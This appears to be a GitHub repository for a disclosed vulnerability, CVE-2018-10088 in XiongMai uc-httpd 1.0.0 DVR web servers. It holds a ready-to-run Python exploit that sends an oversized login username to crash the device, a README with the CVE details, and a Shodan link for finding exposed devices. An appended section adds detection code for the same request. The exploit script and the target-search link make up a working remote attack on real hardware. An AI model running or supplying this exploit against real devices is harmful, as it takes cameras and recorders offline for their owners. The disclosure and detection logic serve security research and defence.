├── LICENSE
├── 0dayPoC.py
└── README.md

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2018 bitfu

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/0dayPoC.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

#######################################################################################
#
# Exploit Title: XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit
# Date: 08/06/2018
# Vendor Status: Informed (17/02/2018)
# CVE ID: CVE-2018-10088
# Exploit Author: Andrew Watson
# Contact: https://keybase.io/bitfu
# Software Version: XiongMai uc-httpd 1.0.0
# Vendor Homepage: http://www.xiongmaitech.com/en/
# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
# PoC Details: Payload requires a minimum length of 85
# References: https://github.com/bitfu/uc-httpd-1.0.0-buffer-overflow-exploit
#             https://www.shodan.io/search?query=uc-httpd+1.0.0
#
# DISCLAIMER: This proof of concept is provided for educational purposes only!
#
#######################################################################################


import socket
import sys

payload="A" * 85

print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"

if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " \n"
    sys.exit()

print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],81))
s.send('POST /login.htm HTTP/1.1\r\n')
s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
s.recv(1024)
s.close()
print "\nExploit complete!"

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# uc-httpd-1.0.0-buffer-overflow-exploit

[XiongMai uc-httpd 1.0.0 buffer overflow exploit proof of concept]

Proof of Concept code: 0dayPoC.py

CVE-2018-10088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10088

Thanks to the CVE Assignment Team for their help structuring the following:

[Description]
Buffer overflow in XiongMai uc-httpd 1.0.0 allows unauthenticated
attackers to execute Denial of Service remotely,
or possibly have unspecified other impact,
via a Web camera viewer interface, a different vulnerability than CVE-2017-16725.

------------------------------------------

[Additional Information]
Potential for development into full RCE with root permissions as the
Sofia process runs as root on the DVR tested. The vulnerability could
potentially affect hundreds of thousands of DVRs according to
Shodan.io

------------------------------------------

[Vulnerability Type]
Buffer Overflow

------------------------------------------

[Vendor of Product]
Xiongmai Technology

------------------------------------------

[Affected Product Code Base]
xiongmai uc-httpd - 1.0.0

------------------------------------------

[Affected Component]
Currently the PoC leads to Denial of Service by crashing the process (Sofia) that runs multiple services on the DVR,
including the uc-httpd web server.

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Denial of Service]
True

------------------------------------------

[Attack Vectors]
Sending a crafted HTTP POST request via the Web camera viewer login form at https://www.shodan.io/search?query=uc-httpd+1.0.0

------------------------------------------

[Reference]
https://github.com/bitfu/uc-httpd-1.0.0-buffer-overflow-exploit

------------------------------------------

[Discoverer]
Andrew Watson
Contact: https://keybase.io/bitfu
--------------------------------------------------------------------------------
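
The README and the PoC header describe the trigger as a POST to `/login.htm` whose `username` value is at least 85 characters long. The following detection logic for that request shape is an added example, not part of the original repository; the rule name, the sample traffic and the use of 85 as an alert threshold are assumptions.

```python
# Added example: flag login POSTs whose username field is long enough to match
# the overflow condition described on this page (CVE-2018-10088).
LOGIN_PATH = "/login.htm"      # path used by the page's PoC
MIN_OVERFLOW_LEN = 85          # "minimum length of 85" per the PoC header;
                               # using it as the alert threshold is an assumption


def username_lengths(raw: bytes):
    """Yield the raw length of every username= value in a login POST."""
    text = raw.decode("latin-1")            # latin-1 never fails on arbitrary bytes
    request_line, _, rest = text.partition("\r\n")
    parts = request_line.split(" ")
    if len(parts) < 2 or parts[0].upper() != "POST":
        return
    if parts[1].split("?", 1)[0] != LOGIN_PATH:
        return
    # The PoC puts the form data right after the request line, with no headers
    # and no blank line, so every remaining line is scanned, not only the body.
    for line in rest.split("\r\n"):
        for pair in line.split("&"):
            key, sep, value = pair.partition("=")
            if sep and key == "username":
                yield len(value)            # raw length is >= any decoded length


def inspect_request(raw: bytes):
    """Return an alert dict for an oversized username, else None."""
    longest = max(username_lengths(raw), default=None)
    if longest is not None and longest >= MIN_OVERFLOW_LEN:
        return {"rule": "CVE-2018-10088-long-username", "length": longest}
    return None


# Constructed sample traffic (not captured from a real device).
SAMPLES = {
    "headerless_long": b"POST /login.htm HTTP/1.1\r\ncommand=login&username="
                       + b"A" * 85 + b"&password=x\r\n\r\n",
    "normal_login": b"POST /login.htm HTTP/1.1\r\nHost: dvr.example\r\n"
                    b"Content-Length: 39\r\n\r\ncommand=login&username=admin&password=x",
    "just_under": b"POST /login.htm HTTP/1.1\r\n\r\nusername=" + b"B" * 84,
    "other_path": b"POST /index.htm HTTP/1.1\r\n\r\nusername=" + b"C" * 200,
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw))
```

The same length check can run in a reverse proxy or IDS placed in front of the DVR, where a request that matches can be dropped before it reaches the Sofia process.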